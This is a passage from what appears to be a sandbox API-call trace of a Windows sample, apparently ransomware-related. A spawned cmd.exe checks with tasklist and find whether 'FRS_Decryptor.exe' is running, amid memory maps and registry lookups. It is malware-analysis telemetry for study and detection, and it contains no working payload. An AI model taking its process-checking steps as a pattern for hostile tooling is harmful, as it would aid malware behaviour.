lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0091.016] _fileno (_File=0x76ea4c28) returned 1 [0091.016] _write (in: _FileHandle=1, _Buf=0xae8070*, _MaxCharCount=0x61 | out: _Buf=0xae8070*) returned 97 [0091.016] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.016] _fileno (_File=0x76ea4c28) returned 1 [0091.016] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0091.016] LocalFree (hMem=0xae8070) returned 0x0 [0091.016] LocalFree (hMem=0xae7fa0) returned 0x0 [0091.016] IcmpCloseHandle (IcmpHandle=0xad6c60) returned 1 [0091.016] LocalFree (hMem=0xadc4a8) returned 0x0 [0091.016] LocalFree (hMem=0xae5270) returned 0x0 [0091.016] WSACleanup () returned 0 [0091.016] exit (_Code=0) Thread: id = 233 os_tid = 0x2a4 Thread: id = 234 os_tid = 0x664 Process: id = "78" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x680d000" os_pid = "0x8e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4146 start_va = 0xf10000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 4147 start_va = 0xf30000 end_va = 0xf31fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 4148 start_va = 0xf40000 end_va = 0xf4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 4149 start_va = 0xf50000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 4150 start_va = 0xf90000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 4151 start_va = 0x1090000 end_va = 0x1093fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 4152 start_va = 0x10a0000 end_va = 0x10a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010a0000" filename = "" Region: id = 4153 start_va = 0x10b0000 end_va = 0x10b1fff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 4154 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4155 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4156 start_va = 0x7e3f0000 end_va = 0x7e412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e3f0000" filename = "" Region: id = 4157 start_va = 0x7e413000 end_va = 0x7e413fff entry_point = 0x0 region_type = private name = "private_0x000000007e413000" filename = "" Region: id = 4158 start_va = 0x7e414000 end_va = 0x7e414fff entry_point = 0x0 region_type = private name = "private_0x000000007e414000" filename = "" Region: id = 4159 start_va = 0x7e41d000 end_va = 0x7e41ffff entry_point = 0x0 region_type = private name = "private_0x000000007e41d000" filename = "" Region: id = 4160 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4161 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4162 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4163 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4164 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 4165 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4166 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4167 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4168 start_va = 0xf10000 end_va = 0xf1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 4169 start_va = 0x10c0000 end_va = 0x113dfff entry_point = 0x10c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4170 start_va = 0x1410000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 4171 start_va = 0x16f0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 4172 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4173 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4174 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4175 start_va = 0x7e2f0000 end_va = 0x7e3effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e2f0000" filename = "" Region: id = 4176 start_va = 0xf20000 end_va = 0xf23fff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 4177 start_va = 0x1700000 end_va = 0x19d4fff entry_point = 0x1700000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4196 start_va = 0xf30000 end_va = 0xf33fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Thread: id = 235 os_tid = 0x884 [0091.043] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0091.043] __set_app_type (_Type=0x1) [0091.044] __p__fmode () returned 0x76ea1768 [0091.044] __p__commode () returned 0x76ea176c [0091.044] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0091.044] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0091.044] GetCurrentThreadId () returned 0x884 [0091.044] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x884) returned 0x34 [0091.044] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0091.044] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0091.044] SetThreadUILanguage (LangId=0x0) returned 0x409 [0091.046] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x108f7f0 | out: phkResult=0x108f7f0*=0x0) returned 0x2 [0091.046] VirtualQuery (in: lpAddress=0x108f7ff, lpBuffer=0x108f798, dwLength=0x1c | out: lpBuffer=0x108f798*(BaseAddress=0x108f000, AllocationBase=0xf90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0091.046] VirtualQuery (in: lpAddress=0xf90000, lpBuffer=0x108f798, dwLength=0x1c | out: lpBuffer=0x108f798*(BaseAddress=0xf90000, AllocationBase=0xf90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0091.046] VirtualQuery (in: lpAddress=0xf91000, lpBuffer=0x108f798, dwLength=0x1c | out: lpBuffer=0x108f798*(BaseAddress=0xf91000, AllocationBase=0xf90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0091.046] VirtualQuery (in: lpAddress=0xf93000, lpBuffer=0x108f798, dwLength=0x1c | out: lpBuffer=0x108f798*(BaseAddress=0xf93000, AllocationBase=0xf90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0091.046] VirtualQuery (in: lpAddress=0x1090000, lpBuffer=0x108f798, dwLength=0x1c | out: lpBuffer=0x108f798*(BaseAddress=0x1090000, AllocationBase=0x1090000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0091.046] GetConsoleOutputCP () returned 0x1b5 [0091.046] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0091.046] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0091.046] _get_osfhandle (_FileHandle=1) returned 0x254 [0091.046] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0091.046] _get_osfhandle (_FileHandle=1) returned 0x254 [0091.046] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0091.046] _get_osfhandle (_FileHandle=0) returned 0x24 [0091.047] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0091.047] GetEnvironmentStringsW () returned 0x14140c0* [0091.047] FreeEnvironmentStringsA (penv="=") returned 1 [0091.047] GetEnvironmentStringsW () returned 0x14140c0* [0091.047] FreeEnvironmentStringsA (penv="=") returned 1 [0091.047] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x108e740 | out: phkResult=0x108e740*=0x44) returned 0x0 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x0, lpData=0x108e74c*=0x0, lpcbData=0x108e744*=0x1000) returned 0x2 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x4, lpData=0x108e74c*=0x1, lpcbData=0x108e744*=0x4) returned 0x0 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x0, lpData=0x108e74c*=0x1, lpcbData=0x108e744*=0x1000) returned 0x2 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x4, lpData=0x108e74c*=0x0, lpcbData=0x108e744*=0x4) returned 0x0 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x4, lpData=0x108e74c*=0x40, lpcbData=0x108e744*=0x4) returned 0x0 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x4, lpData=0x108e74c*=0x40, lpcbData=0x108e744*=0x4) returned 0x0 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x0, lpData=0x108e74c*=0x40, lpcbData=0x108e744*=0x1000) returned 0x2 [0091.047] RegCloseKey (hKey=0x44) returned 0x0 [0091.047] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x108e740 | out: phkResult=0x108e740*=0x44) returned 0x0 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x0, lpData=0x108e74c*=0x40, lpcbData=0x108e744*=0x1000) returned 0x2 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x4, lpData=0x108e74c*=0x1, lpcbData=0x108e744*=0x4) returned 0x0 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x0, lpData=0x108e74c*=0x1, lpcbData=0x108e744*=0x1000) returned 0x2 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x4, lpData=0x108e74c*=0x0, lpcbData=0x108e744*=0x4) returned 0x0 [0091.047] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x4, lpData=0x108e74c*=0x9, lpcbData=0x108e744*=0x4) returned 0x0 [0091.048] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x4, lpData=0x108e74c*=0x9, lpcbData=0x108e744*=0x4) returned 0x0 [0091.048] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x108e748, lpData=0x108e74c, lpcbData=0x108e744*=0x1000 | out: lpType=0x108e748*=0x0, lpData=0x108e74c*=0x9, lpcbData=0x108e744*=0x1000) returned 0x2 [0091.048] RegCloseKey (hKey=0x44) returned 0x0 [0091.048] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50086 [0091.048] srand (_Seed=0x5aa50086) [0091.048] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0091.048] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0091.048] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0091.048] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14140c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0091.048] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0091.048] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.048] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0091.048] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.048] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0091.048] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0091.048] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0091.048] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0091.048] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0091.048] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0091.048] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0091.048] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0091.048] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0091.048] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x108f520 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0091.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x108f520, lpFilePart=0x108f51c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x108f51c*="Desktop") returned 0x1c [0091.048] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0091.048] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x108f298 | out: lpFindFileData=0x108f298) returned 0x14142d8 [0091.049] FindClose (in: hFindFile=0x14142d8 | out: hFindFile=0x14142d8) returned 1 [0091.049] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x108f298 | out: lpFindFileData=0x108f298) returned 0x14142d8 [0091.049] FindClose (in: hFindFile=0x14142d8 | out: hFindFile=0x14142d8) returned 1 [0091.049] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0091.049] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x108f298 | out: lpFindFileData=0x108f298) returned 0x14142d8 [0091.049] FindClose (in: hFindFile=0x14142d8 | out: hFindFile=0x14142d8) returned 1 [0091.049] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0091.049] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0091.049] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0091.049] GetEnvironmentStringsW () returned 0x1416190* [0091.049] FreeEnvironmentStringsA (penv="=") returned 1 [0091.049] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0091.050] GetConsoleOutputCP () returned 0x1b5 [0091.050] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0091.050] GetUserDefaultLCID () returned 0x409 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x108f64c, cchData=128 | out: lpLCData="0") returned 2 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x108f64c, cchData=128 | out: lpLCData="0") returned 2 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x108f64c, cchData=128 | out: lpLCData="1") returned 2 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0091.050] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0091.050] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0091.051] GetConsoleTitleW (in: lpConsoleTitle=0x1414e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0091.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0091.051] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0091.052] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0091.052] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0091.052] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0091.052] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0091.052] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0091.052] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0091.052] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0091.052] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0091.052] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0091.053] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0091.053] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0091.053] _wcsicmp (_String1="IF", _String2="find") returned 3 [0091.053] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0091.053] _wcsicmp (_String1="REM", _String2="find") returned 12 [0091.053] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0091.054] _pipe (in: _PtHandles=0x14151f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x14151f0) returned 0 [0091.054] _dup (_FileHandle=1) returned 5 [0091.054] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0091.054] _close (_FileHandle=4) returned 0 [0091.054] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0091.054] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0091.054] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0091.054] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0091.054] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0091.054] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0091.054] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0091.054] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0091.054] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0091.054] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0091.054] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0091.054] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0091.054] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0091.054] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0091.054] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0091.054] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0091.054] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0091.055] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0091.055] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0091.055] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0091.055] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0091.055] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0091.055] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0091.055] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0091.055] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0091.055] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0091.055] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0091.055] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0091.055] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0091.055] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0091.055] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0091.055] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0091.055] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0091.055] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0091.055] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0091.055] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0091.055] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0091.055] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0091.055] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0091.055] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0091.055] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0091.055] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0091.055] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0091.055] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0091.055] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0091.055] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0091.055] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0091.055] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0091.055] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0091.055] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0091.055] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0091.055] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0091.055] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0091.055] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0091.055] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0091.055] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0091.055] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0091.055] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0091.055] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0091.055] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0091.055] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0091.055] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0091.055] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0091.055] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 